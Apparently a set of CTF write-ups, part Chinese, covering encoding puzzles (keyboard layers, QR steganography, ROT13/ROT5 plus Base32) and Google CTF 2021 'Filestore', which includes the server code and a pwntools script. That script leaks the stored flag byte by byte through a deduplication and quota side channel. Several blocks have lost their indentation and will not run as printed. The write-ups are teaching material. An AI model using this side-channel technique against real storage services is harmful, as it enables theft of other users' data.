    Names are left-justified to 15 characters and separated by commas; a blank
    line follows every layer.
    """
    for layer in range(3):
        for line in range(6):
            first = layer * 108 + line * 18
            for code in keymaps[first:first + 18]:
                print(keycodeToKey[code].ljust(15), end=',')
            print()
        print()
formatLayer()
buildLayerMap(1)
buildLayerMap(2)
SEED = rand()
sum = 0
enc = "1CTED8IL-BIMM-SMFP-HOKP-HOIDRZL4W6KR"
Table = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
flag=""
for i in range(36):
rand()
Layer_stat = (i // 18) + 1
if enc[i] in Table:
if Layer_stat == 1:
keycode = Table.index(enc[i]) - (rand() % 36)
if keycode < KC_A:
keycode += 36
sum += keycode
else:
keycode = Table.index(enc[i]) + (sum % 40)
if keycode > KC_0:
keycode -= 36
sum += keycode
flag += LayerMap[ Layer_stat ][ keycodeToKey[keycode] ][3:]
else:
flag += enc[i]
print("flag{" + flag + "}")

01世界

stegsolve 01.png
#click left color map get qrcode
#decode qrcode get flag

Base

#give 31332b353d3f3f3f2d2d2d2d7a6d6a74706d3838757366677a6d797474736467746d65697a6c6c74787a6d657a61646a766d6f66757365677262776b7a77666a7a61796f7a646d75373d3d3d
ctf-party 31332b353d3f3f3f2d2d2d2d7a6d6a74706d3838757366677a6d797474736467746d65697a6c6c74787a6d657a61646a766d6f66757365677262776b7a77666a7a61796f7a646d75373d3d3d from_hex
#get
13+5=???----zmjtpm88usfgzmyttsdgtmeizlltxzmezadjvmofusegrbwkzwfjzayozdmu7===
#后面部分很像base64,13+5联想到ROT13+ROT5,解密得到
mzwgcz33hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh2===
根据题目Base32解密为flag{9e6ef1a3f5f0e31cadd29c297bef5ad2}

exp.rb

require 'ctf_party'
#后面部分很像base64,13+5联想到ROT13+ROT5
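# The hint "13+5" means ROT13 for the letters and ROT5 for the digits.
s = "zmjtpm88usfgzmyttsdgtmeizlltxzmezadjvmofusegrbwkzwfjzayozdmu7==="
# ROT13 on the letters; the digits are left as they are by this step.
r13 = s.rot(shift: 13)
p r13  # mzwgcz88hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh7===
# ROT5 on the digits only. The original computed s.rot(shift: 5) from the
# untouched input and never used it, so the printed text still held 8 and 7
# where the Base32 string in the write-up has 3 and 2.
decoded = r13.tr('0-9', '5-90-4')
p decoded  # mzwgcz33hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh2===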

Filestore(Google_CTF)

task.py

import os, secrets, string, time
# from flag import flag
# my flag
flag = "flag{1ww717-nxnxksn-xsnjxsnxjs}"
def main():
    """Run the interactive file store: load / store / status / exit over stdin and stdout.

    All files, including the flag stored at start-up, share one 64 KiB blob and
    one deduplicating ``store``. Security note: ``status`` reports the used
    quota to three decimals of a kB, and a stored line that is already present
    in the blob does not increase it, so a client can tell whether data it
    submits matches bytes stored by someone else. Keeping deduplication within
    one user's own data, or not exposing exact usage, closes that channel.
    """
    # It's a tiny server...
    blob = bytearray(2**16)
    files = {}
    used = 0
    # Use deduplication to save space.
    def store(data):
        """Store ``data`` and return a random 16-character file id.

        The data is split into parts. Each part is either a reference to bytes
        already in the blob or a newly appended chunk of at most MINIMUM_BLOCK bytes.
        """
        nonlocal used
        MINIMUM_BLOCK = 16
        MAXIMUM_BLOCK = 1024
        part_list = []
        while data:
            prefix = data[:MINIMUM_BLOCK]
            ind = -1
            bestlen, bestind = 0, -1
            # Scan every occurrence of the prefix in the blob and keep the one
            # sharing the longest common prefix with the remaining data
            # (compared over at most MAXIMUM_BLOCK bytes).
            while True:
                ind = blob.find(prefix, ind+1)
                if ind == -1: break
                length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))
                if length > bestlen:
                    bestlen, bestind = length, ind
            if bestind != -1:
                # Deduplicated: reference the existing bytes; `used` does not change.
                part, data = data[:bestlen], data[bestlen:]
                part_list.append((bestind, bestlen))
            else:
                # New data: append one block to the blob and account for it.
                part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]
                blob[used:used+len(part)] = part
                part_list.append((used, len(part)))
                used += len(part)
                # Capacity check; an AssertionError ends the session through the
                # `except Exception` around main(). Asserts are removed under -O.
                assert used <= len(blob)
        fid = "".join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))
        files[fid] = part_list
        return fid
    def load(fid):
        """Reassemble and return the bytes of file ``fid``; an unknown id raises KeyError."""
        data = []
        for ind, length in files[fid]:
            data.append(blob[ind:ind+length])
        return b"".join(data)
    print("Welcome to our file storage solution.")
    # Store the flag as one of the files.
    store(bytes(flag, "utf-8"))
    while True:
        print()
        print("Menu:")
        print("- load")
        print("- store")
        print("- status")
        print("- exit")
        choice = input().strip().lower()
        if choice == "load":
            print("Send me the file id...")
            fid = input().strip()
            data = load(fid)
            print(data.decode())
        elif choice == "store":
            print("Send me a line of data...")
            data = input().strip()
            fid = store(bytes(data, "utf-8"))
            print("Stored! Here's your file id:")
            print(fid)
        elif choice == "status":
            print("User: ctfplayer")
            print("Time: %s" % time.asctime())
            # Usage is shown with 0.001 kB resolution, i.e. close to one byte.
            kb = used / 1024.0
            kb_all = len(blob) / 1024.0
            print("Quota: %0.3fkB/%0.3fkB" % (kb, kb_all))
            print("Files: %d" % len(files))
        elif choice == "exit":
            break
        else:
            print("Nope.")
            break
try:
main()
except Exception:
print("Nope.")
time.sleep(1)

exp.py

from pwn import *
local = True
debug = False
if local:
r = process(["python3", "task.py"], level='debug') if debug else process(["python3", "task.py"])
else:
r = remote("filestore.2021.ctfcompetition.com", 1337, level = 'debug') if debug else remote("filestore.2021.ctfcompetition.com", 1337)
possible_chars = [chr(i) for i in range(33, 127)]
FLAG = "flag{"
r.recvuntil(b"- exit\n")
for _ in range(30):
try:
for char in possible_chars:
r.sendline(b"status")
r.recvuntil(b"Quota: ")
current_quota = r.recvline(keepends=False)
r.sendline(b"store")
r.sendline(FLAG[-15:] + char)
r.sendline(b"status")
r.recvuntil(b"Quota: ")
new_quota = r.recvline(keepends=False)
if new_quota == current_quota:
FLAG += char
print(FLAG)
break
except EOFError:
if local:
r = process(["python3", "task.py"], level='debug') if debug else process(["python3", "task.py"])
else:
r = remote("filestore.2021.ctfcompetition.com", 1337, level = 'debug') if debug else remote("filestore.2021.ctfcompetition.com", 1337)